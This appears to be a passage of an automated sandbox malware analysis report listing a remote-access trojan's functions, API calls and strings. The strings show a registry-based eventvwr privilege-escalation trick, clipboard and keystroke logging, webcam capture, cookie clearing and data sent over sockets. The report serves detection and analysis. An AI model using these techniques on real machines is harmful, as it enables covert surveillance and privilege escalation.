                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??0?$basic_string@D@1@@$??1?$basic_string@V01@V01@@$Y?$basic_string@$??4?$basic_string@??8std@@?c_str@?$basic_string@CloseD@2@@0@EnvironmentEventExistsExpandFileOpenPathQueryStringsV?$basic_string@Value
                                                • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                • API String ID: 2836000926-4073444585
                                                • Opcode ID: 32045a73df500a43e2accbea536c45fd1ecb647eb105b40789e100ea343bd2c1
                                                • Instruction ID: 6ca23f0a21b17df671fbd93d2ed52a4360a3a4c9e74fe22fcc34686a8daba431
                                                • Opcode Fuzzy Hash: 32045a73df500a43e2accbea536c45fd1ecb647eb105b40789e100ea343bd2c1
                                                • Instruction Fuzzy Hash: B4415672904249ABDB00FFE4DD599EE7B7CEB14306F1080AAF502B3190DA399F49C769
                                                Function 0040300F Relevance: 35.1, APIs: 13, Strings: 7, Instructions: 94libraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryA.KERNEL32(ntdll,RtlGetNtVersionNumbers,00419970,00419BC8,00000000,?,?,?,?,?,?,?,?,?,004087DB), ref: 00403022
                                                • GetProcAddress.KERNEL32(00000000), ref: 00403029
                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000003,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004087DB), ref: 00403076
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004087DB), ref: 0040307F
                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004087DB), ref: 00403089
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004087DB), ref: 00403094
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(origmsc,00000000), ref: 004030A5
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00419994,?), ref: 004030CA
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(004137F0,004137F0,00000000), ref: 004030FA
                                                • ShellExecuteW.SHELL32(00000000,open,00000000), ref: 00403107
                                                • exit.MSVCRT ref: 00403113
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040311C
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403125
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$?c_str@?$basic_string@$G@2@@std@@G@std@@$??1?$basic_string@?length@?$basic_string@$??0?$basic_string@AddressExecuteG@1@@LibraryLoadProcShellexit
                                                • String ID: RtlGetNtVersionNumbers$Software\Classes\mscfile\shell\open\command$eventvwr.exe$mscfile\shell\open\command$ntdll$open$origmsc
                                                • API String ID: 2630578099-3715812343
                                                • Opcode ID: 84f2a4baa850f3925d098cf84792ce8ebd723e49b52ac0afd2516b53762b05f8
                                                • Instruction ID: b662692c131159cff8273747fd33031b7b3aab2cb8fdd887bb70e0aaef1a7605
                                                • Opcode Fuzzy Hash: 84f2a4baa850f3925d098cf84792ce8ebd723e49b52ac0afd2516b53762b05f8
                                                • Instruction Fuzzy Hash: FE2173B5540205BBDB05AFA09C9EEEF7F6CEB08717F008069F602A11D1DA785B85876D
                                                Function 00405C8A Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 135COMMON
                                                Download Yara Rule
                                                APIs
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00413A08,?,00000000,?,75A8C0D0,?), ref: 00405CB3
                                                • toupper.MSVCRT ref: 00405CC2
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60( [Ctrl + ,?,00000000), ref: 00405CD6
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@D@Z.MSVCP60(?,00000000), ref: 00405CE1
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405CFD
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405D06
                                                • toupper.MSVCRT ref: 00405D99
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00405CEB
                                                  • Part of subcall function 00404857: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,00000000,?,00406CE6), ref: 0040486A
                                                  • Part of subcall function 00404857: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,00000000,?,00406CE6), ref: 0040487D
                                                  • Part of subcall function 00404857: SetEvent.KERNEL32(00000000,?,00406CE6), ref: 00404886
                                                  • Part of subcall function 00404857: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000,?,00406CE6), ref: 00404895
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,[End of clipboard text],00000000,?,75A8C0D0,?), ref: 00405D0F
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?, [Ctrl + V][Following text has been pasted from clipboard:],00000000,?,[End of clipboard text],00000000,?,75A8C0D0,?), ref: 00405D39
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,[End of clipboard text],00000000,?,75A8C0D0,?), ref: 00405D43
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,[End of clipboard text],00000000,?,75A8C0D0,?), ref: 00405D55
                                                • tolower.MSVCRT ref: 00405D72
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000001,?), ref: 00405DF7
                                                Strings
                                                • [Ctrl + V][Following text has been pasted from clipboard:], xrefs: 00405D33
                                                • [End of clipboard text], xrefs: 00405D24
                                                • [Ctrl + , xrefs: 00405CCE
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@D@1@@$V01@V01@@V10@Y?$basic_string@toupper$EventV10@0@V10@@tolower
                                                • String ID: [End of clipboard text]$ [Ctrl + $ [Ctrl + V][Following text has been pasted from clipboard:]
                                                • API String ID: 1567161615-398269065
                                                • Opcode ID: d0bc9d1c3441adfdd4f1f8ed1816ec3693c1403a484e7e23c6dd56fa6eb5b130
                                                • Instruction ID: 9adeee1e166fa2ba385a4033d536afdcce0fc1b978da8be5d6ab5f4b2a00cb68
                                                • Opcode Fuzzy Hash: d0bc9d1c3441adfdd4f1f8ed1816ec3693c1403a484e7e23c6dd56fa6eb5b130
                                                • Instruction Fuzzy Hash: C341B671904644BBDB15FBA8D8499FF7B78EF00301F14447FE442A31D1DA399B498B9A
                                                Function 004023C0 Relevance: 33.3, APIs: 17, Strings: 2, Instructions: 72networkCOMMON
                                                Download Yara Rule
                                                APIs
                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60([INFO],?,?,?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 004023CA
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60([DataStart],00000013,?,?,?,?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 004023E3
                                                • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000B,?,?,?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 004023EE
                                                • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000F,?,?,?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 004023FB
                                                • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 0040240D
                                                • ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60(?,?,?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 00402418
                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 00402427
                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 00402431
                                                • send.WS2_32(?,00000000), ref: 0040243B
                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 00402447
                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 00402451
                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,00000000,?,?,?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 0040246B
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 00402475
                                                • send.WS2_32(?,00000000), ref: 0040247F
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 00402489
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 00402492
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 0040249B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$?length@?$basic_string@$??1?$basic_string@$?data@?$basic_string@A?$basic_string@send$??0?$basic_string@?c_str@?$basic_string@?empty@?$basic_string@D@1@@V01@V01@@Y?$basic_string@
                                                • String ID: [DataStart]$[INFO]
                                                • API String ID: 1403384299-3696159037
                                                • Opcode ID: dbe42062e35d414f9da2cb159815b1568958d3817d332a5520de37470e6872cf
                                                • Instruction ID: 5d8ce598d3c1e6d6ccf5cffaf713062e2c3c54cedef4e327da0b0d23e45d33b9
                                                • Opcode Fuzzy Hash: dbe42062e35d414f9da2cb159815b1568958d3817d332a5520de37470e6872cf
                                                • Instruction Fuzzy Hash: 8A21F576500109ABCB04EF90ED59AEE7B78EB18702F108179F903A61E1EF745F04CBA9
                                                Function 00401C5A Relevance: 31.6, APIs: 14, Strings: 4, Instructions: 132sleepCOMMON
                                                Download Yara Rule
                                                APIs
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00401C64
                                                • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,6C995E04), ref: 00401C7C
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00419288), ref: 00401C8C
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00401C9B
                                                  • Part of subcall function 00411550: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 0041155F
                                                  • Part of subcall function 00411550: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 00411576
                                                  • Part of subcall function 00411550: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C), ref: 0041158C
                                                  • Part of subcall function 00411550: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 004115AA
                                                  • Part of subcall function 00411550: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 004115B4
                                                  • Part of subcall function 00411550: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 004115BD
                                                  • Part of subcall function 00411550: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 004115D2
                                                  • Part of subcall function 00411550: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 004115DF
                                                  • Part of subcall function 00411550: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 00411631
                                                  • Part of subcall function 00411550: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 0041163A
                                                  • Part of subcall function 00411550: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 00411643
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00401CEB
                                                • atoi.MSVCRT(00000000), ref: 00401CF2
                                                • Sleep.KERNEL32 ref: 00401D01
                                                  • Part of subcall function 00401E2D: __EH_prolog.LIBCMT ref: 00401E32
                                                  • Part of subcall function 00401E2D: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000000,?), ref: 00401E69
                                                  • Part of subcall function 00401E2D: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00419288,?,00419288,00419210), ref: 00401E90
                                                  • Part of subcall function 00401E2D: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401EA7
                                                  • Part of subcall function 00401E2D: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401EB4
                                                  • Part of subcall function 00401E2D: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401EC1
                                                  • Part of subcall function 00401E2D: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401ECB
                                                  • Part of subcall function 00401E2D: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000060), ref: 00401EE0
                                                  • Part of subcall function 00401E2D: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401EE9
                                                  • Part of subcall function 00401E2D: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401EF2
                                                  • Part of subcall function 00401E2D: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401EFB
                                                  • Part of subcall function 00401E2D: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401F04
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00401D38
                                                • atoi.MSVCRT(00000000), ref: 00401D3F
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00419210), ref: 00401D60
                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00401D9A
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00419210,00000000,CloseCamera,00000000,OpenCamera), ref: 00401DFE
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000001B), ref: 00401E19
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401E22
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@$V01@@$D@2@@0@Hstd@@V10@0@V?$basic_string@$?c_str@?$basic_string@?length@?$basic_string@V12@$?substr@?$basic_string@D@1@@atoi$??4?$basic_string@?data@?$basic_string@?find@?$basic_string@?size@?$basic_string@H_prologSleepV01@
                                                • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera
                                                • API String ID: 3050406488-3547787478
                                                • Opcode ID: 097334aa1b8e587c306b71286ad700abb771ea4d4b0a742b19a55e0c19a65946
                                                • Instruction ID: 0af599c8da93a3894906099d445701dbc1b414888c4f423a1fb39139a9bf170c
                                                • Opcode Fuzzy Hash: 097334aa1b8e587c306b71286ad700abb771ea4d4b0a742b19a55e0c19a65946
                                                • Instruction Fuzzy Hash: 78415771904215BBCF04BFB5DC19ADE3B68AB05706F0488BAF902A71F1DB789940CB9D
                                                Function 0040C9DF Relevance: 31.6, APIs: 14, Strings: 4, Instructions: 112COMMON
                                                Download Yara Rule
                                                APIs
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040C9FA
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040CA10
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040CA26
                                                  • Part of subcall function 004113E6: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00419970,00419BC8,00000000,00408808,)A,00000000,0000000B), ref: 004113F2
                                                  • Part of subcall function 004113E6: ??2@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411400
                                                  • Part of subcall function 004113E6: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411422
                                                  • Part of subcall function 004113E6: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 00411444
                                                  • Part of subcall function 004113E6: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411458
                                                  • Part of subcall function 004113E6: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411461
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 0040CA48
                                                  • Part of subcall function 00403695: CreateFileW.KERNEL32(0000FDE8,80000000,00000000,00000000,00000003,00000080,00000000), ref: 004036C4
                                                  • Part of subcall function 00403695: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,00419288,?), ref: 004036E8
                                                  • Part of subcall function 00403695: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?), ref: 004036F2
                                                  • Part of subcall function 00403695: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000053,?,?,?,?,?,?), ref: 00403709
                                                  • Part of subcall function 00403695: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403A3C
                                                  • Part of subcall function 00403695: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403A45
                                                  • Part of subcall function 00403695: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403A4E
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040CA63
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Uploaded file: ,00000000,?,00000000,?,00000000,00000000), ref: 0040CA9A
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CABF
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?,?,?,Uploaded file: ,00000000,?,00000000,?,00000000,00000000), ref: 0040CAAB
                                                  • Part of subcall function 00410CD2: GetLocalTime.KERNEL32(?), ref: 00410CE9
                                                  • Part of subcall function 00410CD2: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,%02i:%02i:%02i:%03i ,?,00414BC4,?,00413760,?,?,_E@,?), ref: 00410D1E
                                                  • Part of subcall function 00410CD2: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,_E@,?), ref: 00410D2B
                                                  • Part of subcall function 00410CD2: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,_E@,?), ref: 00410D38
                                                  • Part of subcall function 00410CD2: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,_E@,?), ref: 00410D45
                                                  • Part of subcall function 00410CD2: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,_E@,?), ref: 00410D4F
                                                  • Part of subcall function 00410CD2: printf.MSVCRT ref: 00410D56
                                                  • Part of subcall function 00410CD2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,_E@), ref: 00410D62
                                                  • Part of subcall function 00410CD2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,_E@), ref: 00410D6B
                                                  • Part of subcall function 00410CD2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,_E@), ref: 00410D74
